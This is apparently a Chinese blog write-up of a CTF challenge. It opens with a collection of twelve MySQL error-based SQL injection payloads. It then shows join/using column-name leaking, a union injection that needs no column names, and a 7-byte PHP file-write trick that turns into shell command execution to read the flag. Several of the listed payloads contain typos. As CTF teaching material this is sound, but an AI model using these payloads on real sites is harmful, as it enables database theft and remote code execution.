感觉自己越来越菜了,同时也到了个瓶颈,打一些简单的质量不高的比赛收货并不大,质量比较高的比赛又打不动,不过还是要学习一波,比赛结束后的复现也让我有很大 的收货。

“他们”有什么秘密呢?

先给出一波自己收藏的报错语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
1、通过floor报错,注入语句如下:
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2、通过ExtractValue报错,注入语句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通过UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、通过NAME_CONST报错,注入语句如下:
and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、通过join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

6、通过exp报错,注入语句如下:
and exp(~(select * from (select user () ) a) );

7、通过GeometryCollection()报错,注入语句如下:
and GeometryCollection(()select *from(select user () )a)b );

8、通过polygon ()报错,注入语句如下:
and polygon (()select * from(select user ())a)b );

9、通过multipoint ()报错,注入语句如下:
and multipoint (()select * from(select user() )a)b );

10、通过multlinestring ()报错,注入语句如下:
and multlinestring (()select * from(selectuser () )a)b );

11、通过multpolygon ()报错,注入语句如下:
and multpolygon (()select * from(selectuser () )a)b );

12、通过linestring ()报错,注入语句如下:
and linestring (()select * from(select user() )a)b );

image

1
2
3
数据库名:youcanneverfindme1
表名: product_2017ctf
部分字段名: pro_id

mysql中using的用法为:
using()用于两张表的join查询,要求using()指定的列在两个表中均存在,并使用之用于join的条件。

通过join把两个表连接起来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
mysql> select * from users as a join users as b using(id);
+----+----------+-------------+----------+-------------+
| id | username | password | username | password |
+----+----------+-------------+----------+-------------+
| 1 | Dumb | admin | Dumb | admin |
| 2 | Angelina | admin | Angelina | admin |
| 3 | Dummy | admin | Dummy | admin |
| 4 | secure | admin | secure | admin |
| 5 | stupid | admin | stupid | admin |
| 6 | superman | admin | superman | admin |
| 7 | batman | admin | batman | admin |
| 8 | admin | admin?????? | admin | admin?????? |
| 9 | admin1 | admin | admin1 | admin |
| 10 | admin2 | admin | admin2 | admin |
| 11 | admin3 | admin | admin3 | admin |
| 12 | dhakkan | admin | dhakkan | admin |
| 14 | admin4 | admin | admin4 | admin |
+----+----------+-------------+----------+-------------+
1
2
3
4
5
6
7
8
9
10
11
pro_id=-2 and (select * from (select * from product_2017ctf as a join product_2017ctf as b using(pro_id))as c)

Duplicate column name 'pro_name'

pro_id=-2 and (select * from (select * from product_2017ctf as a join product_2017ctf as b using(pro_id,pro_name))as c)

Duplicate column name 'owner'

pro_id=-2 and (select * from (select * from product_2017ctf as a join product_2017ctf as b using(pro_id,pro_name,owner))as c)

Duplicate column name 'd067a0fa9dc61a6e'

但是d067a0fa9dc61a6e这个字段被ban掉了
无列名注入

1
2
3
4
pro_id=-2  union select 1,d,3,d from (select 1 a,2 b,3 c,4 d from product_2017ctf union select * from product_2017ctf limit 3,1)e


product name:7195ca99696b5a896.php

访问发现可以写入文件,但是限制了7个字节http://www.vuln.cn/6016

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$savepath="files/".sha1($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT'])."/";
if(!is_dir($savepath)){
$oldmask = umask(0);
mkdir($savepath, 0777);
umask($oldmask);
touch($savepath."/index.html");
}
if((@$_POST['filename']) && (@$_POST['content']) ){
$fp = fopen("$savepath".$_POST['filename'], 'w');
fwrite($fp, substr($_POST['content'],0,7) );
fclose($fp);
$msg = 'File saved to <a>'.$savepath.htmlspecialchars($_POST['filename'])."</a>";
}
?>

按顺序POST提交下面3条

1
2
3
filename=p.php&content=<?=`*`;
filename=bash&content=xxx
filename=bash2&content=ls /

再访问p.php,就可以看到

1
327a6c4304ad5938eaf0efb6cc3e53dc.php

再POST
filename=bash2&content=cat /3*
再去访问p.php,右键查看源代码看到flag
详细的过程:
p.php的<?=*; 其中的*会展开成当前文件夹下的文件,并按字母顺序排列
大致上等价于

1
<?php echo `bash bash2 index.html p.php` ?>

访问p.php的时候,bash就会执行bash2这个文件里的命令,后面的文件无视掉
通过修改bash2这个文件的内容就可以构造命令执行。